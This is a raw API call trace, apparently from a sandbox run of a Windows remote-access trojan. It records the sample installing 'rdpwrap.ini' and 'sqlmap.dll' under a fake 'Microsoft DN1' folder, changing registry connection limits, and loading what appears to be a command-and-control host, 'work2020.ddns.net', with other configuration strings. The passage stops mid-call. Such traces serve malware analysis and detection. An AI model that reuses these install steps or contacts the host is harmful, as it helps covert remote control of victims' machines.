flProtect=0x4) returned 0xae0000 [0185.374] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0185.374] lstrcpyW (in: lpString1=0xae0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0185.374] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0185.374] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.374] VirtualQuery (in: lpAddress=0xb40000, lpBuffer=0x34fb38, dwLength=0x1c | out: lpBuffer=0x34fb38*(BaseAddress=0xb40000, AllocationBase=0xb40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.374] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0xb50000 [0185.375] VirtualFree (lpAddress=0xb40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.375] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0185.375] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.376] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 183 [0185.376] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0185.376] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.376] lstrcpyW (in: lpString1=0xae0000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0185.376] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0185.376] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0185.376] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0185.376] lstrcpyW (in: lpString1=0xb40000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0185.377] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0185.377] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0185.377] VirtualQuery (in: lpAddress=0xae0000, lpBuffer=0x34fb38, dwLength=0x1c | out: lpBuffer=0x34fb38*(BaseAddress=0xae0000, AllocationBase=0xae0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.377] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0xb70000 [0185.377] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.377] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0185.377] VirtualFree (lpAddress=0xb40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.377] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0185.377] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.378] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0185.378] lstrcpyW (in: lpString1=0xae0000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0185.378] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0185.378] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0185.378] VirtualQuery (in: lpAddress=0xb60000, lpBuffer=0x34fb38, dwLength=0x1c | out: lpBuffer=0x34fb38*(BaseAddress=0xb60000, AllocationBase=0xb60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.378] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0185.378] VirtualFree (lpAddress=0xb60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.378] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0185.378] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.379] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0185.379] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.379] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0185.379] lstrcpyW (in: lpString1=0xae0000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0185.379] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0185.379] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0185.379] VirtualQuery (in: lpAddress=0xb50000, lpBuffer=0x34fb38, dwLength=0x1c | out: lpBuffer=0x34fb38*(BaseAddress=0xb50000, AllocationBase=0xb50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.379] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0xb60000 [0185.379] VirtualFree (lpAddress=0xb50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.380] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0185.380] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.437] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.438] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x19c [0185.438] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cb9c | out: lpWSAData=0x54cb9c) returned 0 [0185.443] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xb50000 [0185.443] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b4 [0185.443] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cd7c | out: lpWSAData=0x54cd7c) returned 0 [0185.443] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b8 [0185.443] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0185.443] GetTickCount () returned 0x113cd8c [0185.443] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x34f660, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe")) returned 0x3c [0185.443] GetProcessHeap () returned 0x900000 [0185.443] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x400000) returned 0x27d0020 [0185.444] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0185.444] GetFileSize (in: hFile=0x1bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7400 [0185.444] ReadFile (in: hFile=0x1bc, lpBuffer=0x27d0020, nNumberOfBytesToRead=0xb7400, lpNumberOfBytesRead=0x34f554, lpOverlapped=0x0 | out: lpBuffer=0x27d0020*, lpNumberOfBytesRead=0x34f554*=0xb7400, lpOverlapped=0x0) returned 1 [0185.506] CloseHandle (hObject=0x1bc) returned 1 [0185.506] GetProcessHeap () returned 0x900000 [0185.507] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x9343e0 [0185.507] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="\x07©\x97U") returned 0x1bc [0185.507] GetLastError () returned 0x0 [0185.507] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x34f570, lpdwDisposition=0x34f584 | out: phkResult=0x34f570*=0x1c0, lpdwDisposition=0x34f584*=0x2) returned 0x0 [0185.507] RegSetValueExA (in: hKey=0x1c0, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x34f57c*=0xa, cbData=0x4 | out: lpData=0x34f57c*=0xa) returned 0x0 [0185.507] RegSetValueExA (in: hKey=0x1c0, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x34f57c*=0xa, cbData=0x4 | out: lpData=0x34f57c*=0xa) returned 0x0 [0185.507] RegCloseKey (hKey=0x1c0) returned 0x0 [0185.507] Sleep (dwMilliseconds=0x1f4) [0186.019] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c0 [0186.020] GetProcessHeap () returned 0x900000 [0186.020] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xf4) returned 0x92d6f8 [0186.020] GetProcessHeap () returned 0x900000 [0186.020] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x400) returned 0x92d7f8 [0186.020] GetProcessHeap () returned 0x900000 [0186.020] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x11c00) returned 0x93af70 [0186.021] GetProcessHeap () returned 0x900000 [0186.021] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x11c00) returned 0x94cb78 [0186.022] GetProcessHeap () returned 0x900000 [0186.022] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0186.022] GetProcessHeap () returned 0x900000 [0186.022] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4a00) returned 0x92dc00 [0186.022] GetProcessHeap () returned 0x900000 [0186.022] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4a00) returned 0x93af70 [0186.022] GetProcessHeap () returned 0x900000 [0186.022] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92dc00 | out: hHeap=0x900000) returned 1 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x600) returned 0x95e780 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x600) returned 0x92dc00 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x95e780 | out: hHeap=0x900000) returned 1 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x2e00) returned 0x92e208 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x2e00) returned 0x93f978 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92e208 | out: hHeap=0x900000) returned 1 [0186.023] GetProcessHeap () returned 0x900000 [0186.023] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1000) returned 0x92e208 [0186.023] GetProcessHeap () returned 0x900000 [0186.024] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1000) returned 0x92f210 [0186.024] GetProcessHeap () returned 0x900000 [0186.024] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92e208 | out: hHeap=0x900000) returned 1 [0186.024] GetProcessHeap () returned 0x900000 [0186.024] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x95e780 [0186.024] GetProcessHeap () returned 0x900000 [0186.024] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x5a4) returned 0x95e988 [0186.024] GetProcessHeap () returned 0x900000 [0186.024] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x11c00) returned 0x95ef38 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4a00) returned 0x942780 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x600) returned 0x92e208 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x2e00) returned 0x930218 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1000) returned 0x947188 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92f210 | out: hHeap=0x900000) returned 1 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93f978 | out: hHeap=0x900000) returned 1 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92dc00 | out: hHeap=0x900000) returned 1 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x94cb78 | out: hHeap=0x900000) returned 1 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x970b40 [0186.025] GetProcessHeap () returned 0x900000 [0186.025] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x95e780 | out: hHeap=0x900000) returned 1 [0186.025] lstrlenA (lpString=".bss") returned 4 [0186.025] lstrlenA (lpString=".bss") returned 4 [0186.025] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0xb80000 [0186.026] lstrcpyA (in: lpString1=0xb80000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0186.026] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.026] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.026] GetProcessHeap () returned 0x900000 [0186.026] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x11c00) returned 0x948190 [0186.026] lstrlenA (lpString=".text") returned 5 [0186.026] lstrlenA (lpString=".text") returned 5 [0186.026] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.026] lstrcpyA (in: lpString1=0xb90000, lpString2=".text" | out: lpString1=".text") returned=".text" [0186.026] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0186.026] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.027] GetProcessHeap () returned 0x900000 [0186.027] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x948190 | out: hHeap=0x900000) returned 1 [0186.027] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.027] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.027] GetProcessHeap () returned 0x900000 [0186.027] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4a00) returned 0x93af70 [0186.027] lstrlenA (lpString=".rdata") returned 6 [0186.027] lstrlenA (lpString=".rdata") returned 6 [0186.027] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.027] lstrcpyA (in: lpString1=0xb90000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0186.027] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0186.027] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.027] GetProcessHeap () returned 0x900000 [0186.027] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0186.028] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.028] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.029] GetProcessHeap () returned 0x900000 [0186.029] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x600) returned 0x92dc00 [0186.029] lstrlenA (lpString=".data") returned 5 [0186.029] lstrlenA (lpString=".data") returned 5 [0186.029] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.029] lstrcpyA (in: lpString1=0xb90000, lpString2=".data" | out: lpString1=".data") returned=".data" [0186.029] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0186.029] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.029] GetProcessHeap () returned 0x900000 [0186.029] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92dc00 | out: hHeap=0x900000) returned 1 [0186.029] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.029] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.029] GetProcessHeap () returned 0x900000 [0186.029] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x2e00) returned 0x93af70 [0186.030] lstrlenA (lpString=".rsrc") returned 5 [0186.030] lstrlenA (lpString=".rsrc") returned 5 [0186.030] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.030] lstrcpyA (in: lpString1=0xb90000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0186.030] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0186.030] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.030] GetProcessHeap () returned 0x900000 [0186.030] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0186.030] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.030] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.030] GetProcessHeap () returned 0x900000 [0186.031] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1000) returned 0x92e810 [0186.031] lstrlenA (lpString=".reloc") returned 6 [0186.031] lstrlenA (lpString=".reloc") returned 6 [0186.031] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.031] lstrcpyA (in: lpString1=0xb90000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0186.031] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0186.031] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.031] GetProcessHeap () returned 0x900000 [0186.031] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92e810 | out: hHeap=0x900000) returned 1 [0186.031] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.031] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.031] GetProcessHeap () returned 0x900000 [0186.031] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x970d48 [0186.032] lstrlenA (lpString=".bss") returned 4 [0186.032] lstrlenA (lpString=".bss") returned 4 [0186.032] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.032] lstrcpyA (in: lpString1=0xb90000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0186.032] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0186.032] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.032] GetProcessHeap () returned 0x900000 [0186.032] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970d48 | out: hHeap=0x900000) returned 1 [0186.032] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0186.032] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0186.032] GetProcessHeap () returned 0x900000 [0186.032] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x970d48 [0186.032] VirtualFree (lpAddress=0xb80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x92dc00 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x92de08 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92dc00 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1ca) returned 0x92e010 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1ca) returned 0x92dc00 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92e010 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1ca) returned 0x92e010 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x970f50 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x970f90 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970f50 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x970f50 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970f90 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x970f90 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1ca) returned 0x933020 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x1ca) returned 0x9331f8 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x933020 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970f90 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92e010 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.033] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92dc00 | out: hHeap=0x900000) returned 1 [0186.033] GetProcessHeap () returned 0x900000 [0186.034] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x24) returned 0x91d450 [0186.034] lstrlenW (lpString="work2020.ddns.net") returned 17 [0186.034] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xb80000 [0186.034] lstrlenW (lpString="work2020.ddns.net") returned 17 [0186.034] lstrcpyW (in: lpString1=0xb80000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0186.034] lstrlenW (lpString="work2020.ddns.net") returned 17 [0186.034] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.034] lstrcpyW (in: lpString1=0xb90000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0186.034] VirtualFree (lpAddress=0xb80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.034] lstrlenW (lpString="work2020.ddns.net") returned 17 [0186.034] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xb80000 [0186.034] lstrcpyW (in: lpString1=0xb80000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0186.034] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.035] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0186.035] GetProcessHeap () returned 0x900000 [0186.035] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x16) returned 0x927268 [0186.035] lstrlenW (lpString="images.exe") returned 10 [0186.035] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.035] lstrlenW (lpString="images.exe") returned 10 [0186.035] lstrcpyW (in: lpString1=0xb90000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0186.035] lstrlenW (lpString="images.exe") returned 10 [0186.035] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xba0000 [0186.035] lstrcpyW (in: lpString1=0xba0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0186.035] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.035] lstrlenW (lpString="images.exe") returned 10 [0186.035] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xb90000 [0186.036] lstrcpyW (in: lpString1=0xb90000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0186.036] VirtualFree (lpAddress=0xba0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.036] GetProcessHeap () returned 0x900000 [0186.036] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xe) returned 0x927ac0 [0186.036] lstrlenW (lpString="Images") returned 6 [0186.036] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xba0000 [0186.036] lstrlenW (lpString="Images") returned 6 [0186.036] lstrcpyW (in: lpString1=0xba0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0186.036] lstrlenW (lpString="Images") returned 6 [0186.036] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xbb0000 [0186.036] lstrcpyW (in: lpString1=0xbb0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0186.036] VirtualFree (lpAddress=0xba0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.037] lstrlenW (lpString="Images") returned 6 [0186.037] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xba0000 [0186.037] lstrcpyW (in: lpString1=0xba0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0186.037] VirtualFree (lpAddress=0xbb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.037] GetProcessHeap () returned 0x900000 [0186.037] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x16) returned 0x927288 [0186.037] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.037] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xbb0000 [0186.037] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.037] lstrcpyW (in: lpString1=0xbb0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0186.037] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.037] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xbc0000 [0186.038] lstrcpyW (in: lpString1=0xbc0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") 